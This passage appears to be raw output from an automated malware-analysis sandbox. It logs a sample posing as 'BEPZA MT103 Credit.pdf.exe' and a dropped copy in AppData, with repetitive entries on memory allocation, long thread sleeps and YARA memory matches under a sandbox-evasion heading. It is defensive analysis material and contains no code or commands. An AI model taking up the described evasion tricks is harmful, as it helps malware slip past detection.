                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YEGIgzyAhkvT.exe PID: 7996, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: 98C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: 8300000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: A8C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: B8C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: 2B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: 9000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: 79E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: A000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: B000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: 1260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory allocated: 4CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596575Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596343Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596125Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595140Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 594921Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 594811Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 594661Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 594546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599769Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599282Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599157Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599032Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598688Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598079Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597704Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597079Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596684Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596032Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594962Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594621Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6033Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3658Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeWindow / User API: threadDelayed 7300Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeWindow / User API: threadDelayed 2553Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeWindow / User API: threadDelayed 1821Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeWindow / User API: threadDelayed 8014Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 8112Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7916Thread sleep count: 7300 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7916Thread sleep count: 2553 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596575s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -596015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -595031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -594921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -594811s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -594661s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852Thread sleep time: -594546s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 5964Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7840Thread sleep count: 1821 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7840Thread sleep count: 8014 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -599769s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -599641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -599532s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -599407s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -599282s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -599157s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -599032s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -598922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -598813s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -598688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -598563s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -598438s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -598313s >= -30000sJump to behavior
